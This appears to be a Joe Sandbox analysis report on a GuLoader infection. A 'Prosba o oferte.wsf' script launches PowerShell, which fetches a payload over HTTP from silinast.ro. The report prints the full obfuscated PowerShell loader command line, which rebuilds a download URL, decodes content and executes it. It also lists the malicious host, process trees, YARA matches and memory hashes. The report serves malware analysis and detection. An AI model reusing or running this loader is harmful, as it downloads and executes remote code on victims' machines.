                        Oct 8, 2024 10:59:38.649478912 CEST | 80 | OUT | GET /Kommunikuternes.inf HTTP/1.1
                        Host: silinast.ro
                        Connection: Keep-Alive


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        9 | 192.168.2.4 | 49754 | 188.241.183.45 | 80 | 7468 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        Timestamp | Bytes transferred | Direction | Data
                        Oct 8, 2024 10:59:38.662472963 CEST | 80 | OUT | GET /Kommunikuternes.inf HTTP/1.1
                        Host: silinast.ro
                        Connection: Keep-Alive


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        10 | 192.168.2.4 | 49755 | 188.241.183.45 | 80 | 7468 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        Timestamp | Bytes transferred | Direction | Data
                        Oct 8, 2024 10:59:42.694840908 CEST | 80 | OUT | GET /Kommunikuternes.inf HTTP/1.1
                        Host: silinast.ro
                        Connection: Keep-Alive


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        11 | 192.168.2.4 | 49756 | 188.241.183.45 | 80 | 7468 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        Timestamp | Bytes transferred | Direction | Data
                        Oct 8, 2024 10:59:42.708072901 CEST | 80 | OUT | GET /Kommunikuternes.inf HTTP/1.1
                        Host: silinast.ro
                        Connection: Keep-Alive


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        12 | 192.168.2.4 | 49757 | 188.241.183.45 | 80 | 7468 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        Timestamp | Bytes transferred | Direction | Data
                        Oct 8, 2024 10:59:46.726690054 CEST | 80 | OUT | GET /Kommunikuternes.inf HTTP/1.1
                        Host: silinast.ro
                        Connection: Keep-Alive
                        Oct 8, 2024 10:59:47.403297901 CEST | 1236 | IN | HTTP/1.1 200 OK
                        Date: Tue, 08 Oct 2024 08:59:47 GMT
                        Server: Apache
                        Upgrade: h2,h2c
                        Connection: Upgrade, Keep-Alive
                        Last-Modified: Mon, 07 Oct 2024 05:14:42 GMT
                        Accept-Ranges: bytes
                        Content-Length: 482184
                        Keep-Alive: timeout=5, max=100


                        Target ID:0
                        Start time:04:59:16
                        Start date:08/10/2024
                        Path:C:\Windows\System32\wscript.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Prosba o oferte.wsf"
                        Imagebase:0x7ff7d5c10000
                        File size:170'496 bytes
                        MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        Target ID:1
                        Start time:04:59:17
                        Start date:08/10/2024
                        Path:C:\Windows\System32\cmd.exe
                        Wow64 process (32bit):false
                        Commandline:cmd.exe /c ping 6777.6777.6777.677e
                        Imagebase:0x7ff6fa110000
                        File size:289'792 bytes
                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        Target ID:2
                        Start time:04:59:17
                        Start date:08/10/2024
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff7699e0000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        Target ID:3
                        Start time:04:59:17
                        Start date:08/10/2024
                        Path:C:\Windows\System32\PING.EXE
                        Wow64 process (32bit):false
                        Commandline:ping 6777.6777.6777.677e
                        Imagebase:0x7ff69b2d0000
                        File size:22'528 bytes
                        MD5 hash:2F46799D79D22AC72C241EC0322B011D
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Reputation:moderate
                        Has exited:true

                        Target ID:4
                        Start time:04:59:19
                        Start date:08/10/2024
                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        Wow64 process (32bit):false
                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#nettenes Semipopular overstates Photodrome #>;$Lighedsideologis='Omrrer';<#Arbejdsbevgelser Allodialist Amanist Lydkilden Bortvejrede Peristole #>;$Occipitobregmatic=$Recrate149+$host.'PrivateData';If ($Occipitobregmatic) {$Rykkendes++;}function Ridsning89($Kabine){$Tardy=$Gehejmeraaden+$Kabine.Length-$Rykkendes; for( $Antilogarithmic=7;$Antilogarithmic -lt $Tardy;$Antilogarithmic+=8){$Achim='Filterbredders';$Molition+=$Kabine[$Antilogarithmic];$Facetter='Krigserklringer';}$Molition;}function Ruttendes80($Driftsregnskabet){ & ($Ansgningsfristen151) ($Driftsregnskabet);}$Nondiffusible=Ridsning89 'M.urernM Hem,meoAlfaderzHexin,niTingsvil Platonlsk ddera V nero/Dublan 5 Dumpek.Fisende0 Van.it Ostrace( Penc lW Sever,i Sym olnSkoles.dNonubiqoMissilswH,dderrsListles Semi acNlivegenT ,istol Mngder 1Habitus0strandf.Pronoun0 Unloqu;Wh tero RundsaWOpprioriEroderinNjesb,g6Maatter4Gerning;Rekrter VillaexGydning6Rensni,4Barrica;Undisc Foggi r luorev Noelge: Ytri.g1Humors 2Underho1Chrysa .Knivsme0Triker,) kademi postedGSelvbyge jergarcIndtagekSh ndyioUn easi/Per ore2airchec0Konform1Subtrak0Afvegne0Coloniz1 Is,ide0Moviepk1 Bovrup SkrudsaFUngoadeiDyslysirKonstrueF rekomfSteto koHydr baxOrkidxj/ So,ial1Turbomo2Banc,dr1 Doozie. 
E ilog0Polyaem ';$enere=Ridsning89 'BoningeUSmmomets Forthce ReinfurCirc mv-.oninteaGlairiegTitt pye Duss sNLinuxwit emul e ';$oversaettelser=Ridsning89 ' Temp lhTilendetFagretltjuleferpSuissef: andomr/ nthrac/ AvidlysBaldakiiPodargilFiletfai FlaxwonFerskvaalycop rsIndes.rt akettr.OdisblarKatedero Anfgte/CausticKSuboperoOverfrimElf nbemUnd.rstu unmaknToneskiiDementek Loc,moutransmut AfgoereTillg brR turnenPregalve FagidisDisarti.Rettetai DebetsnBarneskf Hj,rpe ';$Rustrdes=Ridsning89 'Snrkled>Kol nna ';$Ansgningsfristen151=Ridsning89 'AdmittaIGtesengEB talinXShownce ';$Lifefully169='forvrredes';$Fagbog='\Selvsikkerhedens.Pan';Ruttendes80 (Ridsning89 'Rygskca$KonomiigBughindLSpoonfuoAf ekslbInduk,iATehtterL Un ors:Uskad la Kont ar Mora deTjen.reN CompriIPo eredG Una so=Strappa$StttekrELampetcNTrenchaV Af.ejs:UdringeaImmunogpRullersPGa enesdStraffoAOp egniTFuracioACloques+Tredve.$Rec iliFOverskgaBogach gSwaverpBSexsymbOOrgueslGNazdrow ');Ruttendes80 (Ridsning89 'Satinsk$Po encegCol,barlSecretiO UltrasbRampageAFumlendL Ompo t:Solariur Vel,ilePaaklisMSidstemiForblfnsHeteroteQuadruprStandarNbroderiEXiphipl=Unpatri$CuttlefoZ.braerv ppositE N gaciRbnk bids Dwe.leAHolbaekeSo,brreTOralizeTPlia.tnEOmvurd l SysselsBrintboEHym.ariRforsker..almoniS Monu,epN.tlistLMycof oIsubricttBajadse(formule$Bra.skoremotiviuKowbirdsisnenneT torherROverid.dFrowsilED.ctyopSstre.kd) Maskab ');Ruttendes80 (Ridsning89 ',rindeh[ TrypaonT rolsueFiligratM,ltino.BeratedsvgaviseeKadrernr arneruVArtesynIPreexpec iretogeOpodidyPTriang,OSkattemiHankytoNAfvarsltFissio.muigenneAOverflyNOutrowsa FortriGOffertoEEksponer housli]Distill:Vaadesk:DagbrknS rchiepEDampskic roniseuSidereaRPineryaIVrist utr publiyAppre,up D.emakRJaguaroOHestehatGenerelODoggylacBlou,ieOStrubehlU unsti Recreme=Middelh Iglerne[CheviotnMesologeberapnitSu dogc.Syr,pliS eleddeeSelvsikc Unex,rudownpourGeswarpIWorktimtPulic dyNonrecip,aandopR Limed,O ,bessiTCirkeleOP.oduktCPudsekaODromiciLForfristStencilY 
colossPButterpEUndercr]Salmary:Isa,xet:UnsuccuTKonditeLRishiseSDeplace1ma tful2 ridine ');$oversaettelser=$remiserne[0];$Polymorphosis=(Ridsning89 'Bar alo$Steens.G EpilogL CheckmOschellaBMiljan AAn sogel Dur ps:TelefonOAdvokatcOriginiCE,genesaAptianaSSamhrig= FelthrNSpleni eLinie,ewBehfter-JagtregoTantal b StrengJBara keEslidstrCComma,pTSu.rhom estoves AntimeY SaloonsDefilertAnt,chaeDobbeltMAfgifts. An.misnAfmaalieSkovsneTPa.fyld.Matten WQuotedrEdi tionBAdminisc acteriLMeltablIKarpetvePremonsN uperiotIon xal ');Ruttendes80 ($Polymorphosis);Ruttendes80 (Ridsning89 ' Sjleg.$UrinemiO SalgspcPoternec teniniagrovelisRedunda.Polic.hHRandruseo ationaKova endBreathfeSomret r bygg,lsvidende[Sikkerh$udse deeWarti en PhasmaeLngdespr Non ere yetstr]dolmere=Afsonin$SeriefrN TemanuoSj krinnmodta edSorbedsi ActionfCommutefho rorouNi kroksIntestaiAleiptebSporvoglPaladineKarakte ');$Jobskabelsesordninger=Ridsning89 ' Thalam$UnameliOTekstmncBedrevncCrochetaLibatins Bleph .FlertalDHelvedeoFiredrawTumulosnAlkars l ForeigofilicinaForstasd CrimelFcostoc,iMickla lPara heeAlmi de(Isogen $UnderekoAllerstv RelubreStopklor KeelmasStone raSpidsbueGran patQua,rint Nat raelaceratlRegenersH nfreleSko emorProc am,Embed.m$P anineSDafniercSnuses oPandekat,ipakvatAffjed i N vnef) Bu ble ';$Scotti=$Arenig;Ruttendes80 (Ridsning89 'Bedst v$ GrundvgPunkerwlv lutaro PharynbResolveAHighfalLPrecom.:GoaleeaMAdlayflECharrosSHelmi,tO Ra.bitCStabensaTilbehrr RedimeD Gethesi O formUtchaderMSepiaer= Ast ol(AstrochtSjuskemeTommeskSFronts,tInertia-DruggerpSmaakraA PentasTPseudochembedsf Pingpon$kuldsejsRegalebCKolportOTordenkTPopularTNebengei Vergeh),predtl ');while (!$Mesocardium) {Ruttendes80 (Ridsning89 'Cambric$GalantegU roduklIulid no MorakkbSkjaldeaBugginglTrochle:PirnedkC Corr.laPrelimilcontekev FilmfeaElektrodSheenieoSammenssUnsoci eEmbedmer Arbejd=Tro aer$BlypeistStribedrdepreciu AntiloeBirdymu ') ;Ruttendes80 $Jobskabelsesordninger;Ruttendes80 (Ridsning89 ' ProcessNrsy etTTran meA Mo regr 
almiakTNeu,osu-Pa apsysUorga iLVom srueIn.ylice TenorsPCracksk Ebionit4 Py tru ');Ruttendes80 (Ridsning89 ' anhan$ressourgHovedvelDemogoroFamilieBMohammeAS.yringlKonkurs:TarmacmMHyperpiEObloquiS SolsikoFugtig cTornensaReloaneRContribDPo tanviDemograuQueniteMIndilat=rdskres(Tungekat.hanneleLunelseSEchino,tunm sse-StreungP,reddesA Sol tiTGatfinnHescapes Rsonnre$ netkorsTjanserCmisa.phOKasikumTUntuneatMiljoe iImp.ctf)Tiltruk ') ;Ruttendes80 (Ridsning89 'Faareky$ Span ggKom.eteL GrevinoUnder tBM sterkAHexactdLBasunki:Svale,rrProat eSPseudomt synk.o=Vrngend$HypothegCelado LG ecingOGrovderb Fr.gtfAPandoorlArbej.s:S ejlmohCurliewO EnolizvVankelmE Sa dviDRegulatsMeritleTreadornDAcetateE.rmorinRAppr xinLangtfreVoldgif+ Theopn+Bl,nder%B erska$Hjer,evrPopsieseBr sekam Emi,teI aldernsTio ontEkagedejRC.tronsnIntertreAmbitio. remkalCTopiadeoNdlsninURevengenKraitsgtPhoma e ') ;$oversaettelser=$remiserne[$Rst];}$Tttedes=326639;$saltene=34997;Ruttendes80 (Ridsning89 ' Readab$ mediefGSkonn.rLOmvurdeOVejrforbSoudanoaIscenesLSmu dre:Addit rgPeripr aT yrocoLArchpriGHomoaniaBuggysblRhi oth2Udvande1Doltish2Danaide Argesta= uanaju BoligakGMingledePecksbrTForthca- agstagCDirektoo HurtignInnobedTKrig skEBeneficnAdopt.vTAgrosto Grssers$MorfinrsstatsobcFrem igoDronte T,anonesT SkydeliAfkogen ');Ruttendes80 (Ridsning89 'oejentr$Til.varg EnhalolLangesso S oldibPedun uaDdse,stlPinlige:BlddeleSAdopt,vkPre ispr AnglicmMnemotekCr zadooI,putterGanespat Dollfie So emitH potrasDertilh Pre.ect=Gudfryg Nyans t[PanorerS,ildoesy diculesS lstictStatio eHomeoidmNyttepl.Hov.dmnCStepninoOrganisnKrrers,vUrbicole GlandurDynamogtUmuligg]venc.es: Apo.op:Stu.gerFBrode irNonk nfo,rosciemRescuerBAmati oa aveates Immunoe Grever6Appeten4UndergiSBldtes.t ungramrma tynii Omkar.nBydren gIndsben(grazess$SygejouGDisacc aAfhngiglFolkebigBen alsaKartof lGardebr2Vilif e1Pseudob2Ratifik) Unretr ');Ruttendes80 (Ridsning89 'Sk ated$Musophag Fu ktiLF itageoUnshameb SyllabaPre 
bytLKlangen:preoccupVinduesR.oodleaOTantaluJRefereneK,stterk ArchemTsupermomMarlberAKaramboGBumbasseBusmanfrSideganE Hypo iN.lhoppe Sharif=Olmintr Cateri [LaanernSS.ingomYA ticapsHolosyst Civil EW enersMNaphtha.Coked fTDis.quiE Temp,rxSymptomT Demihe.Phello ECymosebn EmulsiCUdvikliOLethargDProvan ICo.loqunBi.liotG Frilag]Overmod: Ov.rho:TrstespANo icess B.ggemCRudime,iDiauli,i Arbejd.ConnectgbibliogeSwitcheT CephalstrykknaTT levierS gganpI BebyrdnTrsterngSugem,k( Thia e$Stra leSScheelikGravsknR drulnmDobbeltkOenomanoTumu.usR Som.dato dkritE PengestP.raconsordstrr)Garring ');Ruttendes80 (Ridsning89 'Kultu.e$SovjetrGFlys.yrlChauvinOO.ertrdbSludderA HanderLRoadrun: For ulf CamelkURn eboenC.maenvN KakerleChemehuLudsvednFScru.uloOpsttecRFemma tML gerva= Bystat$ ndiscpS,ruktuRDataselOVibrahaJHyperdoE GyritsK Bagkl tTrk uglMBan eorA ThemedgH spitaeG ksporRFremtidEMajonseNDomsafs.demetonS Ded.cnU Peake bKons rusun.erviTKaritt R illedIBage,psNprecisigVirksom(Skaberi$AfstrafTUrb nisTAdanfejTConominEScar dldPalu amE Un bsts trafi , Michel$UdstansS elotaAPrgt gel DolomitEjeresuE Eftergn HalvtieNonreti)Udbring ');Ruttendes80 $Funnelform;"
                        Imagebase:0x7ff788560000
                        File size:452'608 bytes
                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000004.00000002.2131900489.000002CC94CF3000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                        Reputation:high
                        Has exited:true

                        Target ID:5
                        Start time:04:59:19
                        Start date:08/10/2024
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff7699e0000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        Target ID:9
                        Start time:04:59:51
                        Start date:08/10/2024
                        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "<obfuscated PowerShell script>"
                        Imagebase:0x580000
                        File size:433'152 bytes
                        MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000009.00000002.4239463001.0000000008370000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000009.00000002.4239592864.00000000095B5000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000009.00000002.4228266092.00000000055C6000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                        Reputation:high
                        Has exited:false

                        Target ID:10
                        Start time:04:59:51
                        Start date:08/10/2024
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff7699e0000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:false

                          • Opcode Fuzzy Hash: 583e74053cfd0c8be39c5d9943c6468bf330b02dc110fa698b99fd10e8d6f045
                          • Instruction Fuzzy Hash: 765105B06193D2AFC7128B74C865A65BFB1AF87210B1DC5CBD4848F2A3CA26CC4BD751
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.4235157147.0000000007220000.00000040.00000800.00020000.00000000.sdmp, Offset: 07220000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_7220000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID: 4'^q$4'^q
                          • API String ID: 0-2697143702
                          • Opcode ID: 11d504f0fa7594d5765ccbffc5ca454e7fde86c65cd81f9c2a1626586f21ae48
                          • Instruction ID: 95284f39780f7db465cd4e03fa5d4a245efc218a48557124907f4724de4d3559
                          • Opcode Fuzzy Hash: 11d504f0fa7594d5765ccbffc5ca454e7fde86c65cd81f9c2a1626586f21ae48
                          • Instruction Fuzzy Hash: F641C2F1724266BFCF258B7498506ABBB919FC1214B1484AACA01CF356DE32C847D362
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.4235157147.0000000007220000.00000040.00000800.00020000.00000000.sdmp, Offset: 07220000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_7220000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID: $^q$$^q
                          • API String ID: 0-355816377
                          • Opcode ID: 737c1892d47dc9a7f47dad371a63cbf9f1c1d73d2fbd9601c3ba9747d74e0c13
                          • Instruction ID: 65f3202ebe4e6fae9b0c3fc4e386863d2e9f800ff0f58d2f72a9f972f33dcb86
                          • Opcode Fuzzy Hash: 737c1892d47dc9a7f47dad371a63cbf9f1c1d73d2fbd9601c3ba9747d74e0c13
                          • Instruction Fuzzy Hash: C1218EB03383EE7BDB2509758800F637FA59F86610F248067E940CF286D979C596C361
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.4235157147.0000000007220000.00000040.00000800.00020000.00000000.sdmp, Offset: 07220000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_7220000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID: (f$l
                          • API String ID: 0-3178505098
                          • Opcode ID: 600e90d471df2a3a147ac643b164d5990c46113f1e3373a59f92a5f65077da26
                          • Instruction ID: e85cd35d5a2773c4979c40f46249ffb03a9eba05b07a23f0f3292d6b9f8b7afe
                          • Opcode Fuzzy Hash: 600e90d471df2a3a147ac643b164d5990c46113f1e3373a59f92a5f65077da26
                          • Instruction Fuzzy Hash: 249190B0B10215EFCB14DB65C951B9EBBB2EB88300F10C1A9E9016F795CB71EC52CB91
                          Memory Dump Source
                          • Source File: 00000009.00000002.4213890224.0000000004390000.00000040.00000800.00020000.00000000.sdmp, Offset: 04390000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_4390000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 5ba3633225173d4c9d80aadcc3dfd01ec655c5db5f6c1074a00fe00a6d9bf009
                          • Instruction ID: 81886961af9a534e72a106f0d13a993bf860b968fd31b0995ebd46b1f5579666
                          • Opcode Fuzzy Hash: 5ba3633225173d4c9d80aadcc3dfd01ec655c5db5f6c1074a00fe00a6d9bf009
                          • Instruction Fuzzy Hash: 151227B4A002499FCB05CF99D584AAEFBF2EF48310F258559E815AB365C735ED81CF90
                          Memory Dump Source
                          • Source File: 00000009.00000002.4213890224.0000000004390000.00000040.00000800.00020000.00000000.sdmp, Offset: 04390000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_4390000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 47488ce58a55a932ba3059a2d1c191a47009138a486ae47ce6c735110d73fe34
                          • Instruction ID: 73a0438992cea1a85c50230b4f1e4207d4cf46808f1995abd434e61e1814bffb
                          • Opcode Fuzzy Hash: 47488ce58a55a932ba3059a2d1c191a47009138a486ae47ce6c735110d73fe34
                          • Instruction Fuzzy Hash: 71C18D71A002089FDF18EFA4D984AADBBF6FF85310F159559E806AB364DB34ED49CB40
                          Memory Dump Source
                          • Source File: 00000009.00000002.4213890224.0000000004390000.00000040.00000800.00020000.00000000.sdmp, Offset: 04390000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_4390000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: ff77c5c304df55fcf6ff69e2e1090e2e1422409d9c8e2ee3c236613b097f2359
                          • Instruction ID: e0753249022a0397fef5101c0c629926a09b1793b7602bad5a2f1fc26eba8ffc
                          • Opcode Fuzzy Hash: ff77c5c304df55fcf6ff69e2e1090e2e1422409d9c8e2ee3c236613b097f2359
                          • Instruction Fuzzy Hash: 91D1E774A00219AFDB15DF98D584A9DFBF2FF88320F298559E805AB365C731ED81CB90
                          Memory Dump Source
                          • Source File: 00000009.00000002.4213890224.0000000004390000.00000040.00000800.00020000.00000000.sdmp, Offset: 04390000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_4390000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 8a1283977682651f47ac2adcbe9373fa9da82e1ec910707bcd3638540449f07c
                          • Instruction ID: f3b40ec8241179e534413d96390c54c3adb9f602fb7a58ea618d8c4d6ea79a19
                          • Opcode Fuzzy Hash: 8a1283977682651f47ac2adcbe9373fa9da82e1ec910707bcd3638540449f07c
                          • Instruction Fuzzy Hash: 07A15A6255E3E05FCB03AB2C98B44D67FB09E4B62470A04E7D4C0DF1B3D2289D89C7A6
                          Memory Dump Source
                          • Source File: 00000009.00000002.4213890224.0000000004390000.00000040.00000800.00020000.00000000.sdmp, Offset: 04390000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_4390000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 8a0ca452dae126dba777ccaed1099fcc2aaefc360ed852b6ca3b6f5135e1d018
                          • Instruction ID: f21a072a1433b7c7419d5bbc5080dcf8b2930a1e550271713ec2654aa59a2b7c
                          • Opcode Fuzzy Hash: 8a0ca452dae126dba777ccaed1099fcc2aaefc360ed852b6ca3b6f5135e1d018
                          • Instruction Fuzzy Hash: E8B17D71E10209DFDF14CFA9C88579EBBF1AF48318F249129D819E7294EB74AC45CB85
                          Memory Dump Source
                          • Source File: 00000009.00000002.4213890224.0000000004390000.00000040.00000800.00020000.00000000.sdmp, Offset: 04390000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_4390000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 2d0ce0375f7e7cc5041b71d8271c8468b03572f67ad01f60573363ded1e0ece4
                          • Instruction ID: 0a218784379e661dca898826403bb0faa1b4f18d4f82ed1e5d3b321343f8ff16
                          • Opcode Fuzzy Hash: 2d0ce0375f7e7cc5041b71d8271c8468b03572f67ad01f60573363ded1e0ece4
                          • Instruction Fuzzy Hash: 31B17C70E10209DFDF10CFA9D88179DBBF2AF48314F149529E819EB294EB74A885CF81
                          Memory Dump Source
                          • Source File: 00000009.00000002.4213890224.0000000004390000.00000040.00000800.00020000.00000000.sdmp, Offset: 04390000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_4390000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: d621c2fe44188069712c68c6bc326c6244f98f5bdd31aa0d68a3eb2189cdbc9e
                          • Instruction ID: 83deae43aee1e0004470052d1811db707538fe53039be18ddcf77402ad91004d
                          • Opcode Fuzzy Hash: d621c2fe44188069712c68c6bc326c6244f98f5bdd31aa0d68a3eb2189cdbc9e
                          • Instruction Fuzzy Hash: 3A719070A002098FCB14DF69D880A9DBBF6FF85314F148569E416DB751DB75EC46CB90
                          Memory Dump Source
                          • Source File: 00000009.00000002.4213890224.0000000004390000.00000040.00000800.00020000.00000000.sdmp, Offset: 04390000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_4390000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: e1394e6b0d3d2ba6664b5f8f13bf6872a3356410aa5444a27a1dc945f46bd56f
                          • Instruction ID: ed2bd35c3c31bb8d033a056b906cafd2865c049d3e1df5c972d51778c3093c08
                          • Opcode Fuzzy Hash: e1394e6b0d3d2ba6664b5f8f13bf6872a3356410aa5444a27a1dc945f46bd56f
                          • Instruction Fuzzy Hash: 8481AF35A15204DFCB19DF64C4849AEBBF2BF8A304F1984A9E405AB361DB35ED85CB50
                          Memory Dump Source
                          • Source File: 00000009.00000002.4213890224.0000000004390000.00000040.00000800.00020000.00000000.sdmp, Offset: 04390000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_4390000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 6fa37976aa2d7454911c139fad7c89ffe91e4e480f3e764c891acaa8d459b49d
                          • Instruction ID: ec42339403fdf2f6f1d038fdb1f8b5c57db71536eb23ee773f53fa6c32e19b59
                          • Opcode Fuzzy Hash: 6fa37976aa2d7454911c139fad7c89ffe91e4e480f3e764c891acaa8d459b49d
                          • Instruction Fuzzy Hash: DC711770E002089FDF14DFA5D584BADBBF2BF88314F148429E416AB7A0DB75AD86CB51
                          Memory Dump Source
                          • Source File: 00000009.00000002.4213890224.0000000004390000.00000040.00000800.00020000.00000000.sdmp, Offset: 04390000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_4390000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 92aa1ed89e8f86ddd6a497177a4ec7eb873826314f29c630f253834ddff7a51a
                          • Instruction ID: 562877944c8a6e77de29d9f96777f8deb56a01a832b4c2ad86f6ce89b526b1cf
                          • Opcode Fuzzy Hash: 92aa1ed89e8f86ddd6a497177a4ec7eb873826314f29c630f253834ddff7a51a
                          • Instruction Fuzzy Hash: C9715CB1E00209DFDF10CFA9C8817DEBBF1AF48718F149129E815EB254EB74A846CB95
                          Memory Dump Source
                          • Source File: 00000009.00000002.4213890224.0000000004390000.00000040.00000800.00020000.00000000.sdmp, Offset: 04390000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_4390000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 2f8a6b7c7fead6799ec1cdcc703377ad8c2e227d682e72a388518a480665e175
                          • Instruction ID: 7fa6890961be8e6dbd527e0a1eecdcd797b41e54304eb61f3c3cfabb1bdd9c13
                          • Opcode Fuzzy Hash: 2f8a6b7c7fead6799ec1cdcc703377ad8c2e227d682e72a388518a480665e175
                          • Instruction Fuzzy Hash: DA715BB1E002099FDF14CFA9C8817DEBBF2AF88318F149129E415E7254EB74A846CB95
                          Memory Dump Source
                          • Source File: 00000009.00000002.4235157147.0000000007220000.00000040.00000800.00020000.00000000.sdmp, Offset: 07220000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_7220000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: f683b980437eab24c33550c856b54d79fc151b19b9bc8b7c3c83bec78f7cec7c
                          • Instruction ID: 1793188b2ad545fb265fbb9981a060899737433198d73a26836ce04a69b3074e
                          • Opcode Fuzzy Hash: f683b980437eab24c33550c856b54d79fc151b19b9bc8b7c3c83bec78f7cec7c
                          • Instruction Fuzzy Hash: D641C1F1B10275ABCB25D778940159AFFB29FD2324B04C5AEDD019FB52D922C806D7A1
                          Memory Dump Source
                          • Source File: 00000009.00000002.4213890224.0000000004390000.00000040.00000800.00020000.00000000.sdmp, Offset: 04390000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_4390000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 027532667577e08fbda7a4e24430d0d8010b6074c47e279f5002704f58eed227
                          • Instruction ID: 3c7284cae5202626550114e2a6cf71ff01029683b4affc6d4cd4b670c3e55b9f
